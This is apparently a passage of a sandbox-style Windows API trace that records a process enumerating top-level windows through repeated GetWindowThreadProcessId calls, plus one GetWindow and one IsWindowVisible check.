	[0855.149] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e64
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b58
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e94
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e28
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1df8
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1da8
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c70
	[0855.149] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x163c
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1a10
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x186c
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1d74
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4c8
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1960
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ce4
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b24
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x14e0
	[0855.150] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x17f0
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x854
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1268
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1624
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b9c
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16f4
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x145c
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x17d0
	[0855.151] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1d28
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xcb8
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1190
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x3a8
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1bd0
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1bfc
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1a78
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b90
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b04
	[0855.152] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b34
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b64
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1bb0
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1acc
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1a2c
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x19a8
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1944
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18c8
	[0855.153] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18ac
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18ec
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1898
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc98
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x153c
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1808
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12a4
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1740
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16c4
	[0855.154] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1820
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16ac
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1858
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1664
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10b4
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10ac
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10ec
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1068
	[0855.155] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x17e0
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x102c
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x17a4
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1050
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1694
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1770
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1720
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x165c
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1578
	[0855.156] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16c0
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x161c
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1638
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x15c8
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1554
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1674
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1520
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x14bc
	[0855.157] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf8c
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe9c
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1434
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x14ec
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfcc
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12ac
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1484
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x934
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc0c
	[0855.158] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb08
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x948
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1178
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x13e0
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xcd0
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x13fc
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xdc8
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc18
	[0855.159] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc2c
	[0855.160] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa1c
	[0855.160] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1244
	[0855.160] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xdb0
	[0855.160] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1398
	[0855.160] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1358
	[0855.160] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1370
	[0855.161] GetWindow (hWnd=0x10562, uCmd=0x4) returned 0x0
	[0855.162] IsWindowVisible (hWnd=0x10562) returned 0
	[0855.162] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1340
	[0855.162] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x130c
	[0855.162] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12c0
	[0855.162] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12e4
	[0855.162] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1270
	[0855.162] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1298
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x120c
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x122c
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x11c4
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x11b0
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1188
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1148
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1160
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10fc
	[0855.163] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe34
	[0855.164] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xea4
	[0855.164] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x514
	[0855.164] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe48
	[0855.164] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xbc8
	[0855.164] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xdf8
	[0855.164] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x318
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xcac
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x8bc
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf9c
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf48
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe40
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xecc
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xeb8
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe80
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe98
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe60
	[0855.165] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xee4
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf00
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xdf0
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe1c
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xdd0
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd94
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd74
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd00
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xcd8
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc84
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xca4
	[0855.166] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc64
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc24
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb84
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xbac
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x384
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xab8
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x33c
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa44
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa64
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x8a8
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xaf0
	[0855.167] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x88c
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb04
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x910
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x230
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xac0
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xab4
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xaac
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x3d0
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x978
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa7c
	[0855.168] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x59c
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa88
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa6c
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa68
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x9f8
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa04
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x924
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x8dc
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x7dc
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x768
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x764
	[0855.169] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x820
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x810
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x794
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x83c
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x7ac
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb44
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x6bc
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb5c
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x838
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.170] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x818
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x5b8
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x494
	[0855.171] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ec
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x440
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x7e8
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x730
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2c8
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x31c
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x330
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x128
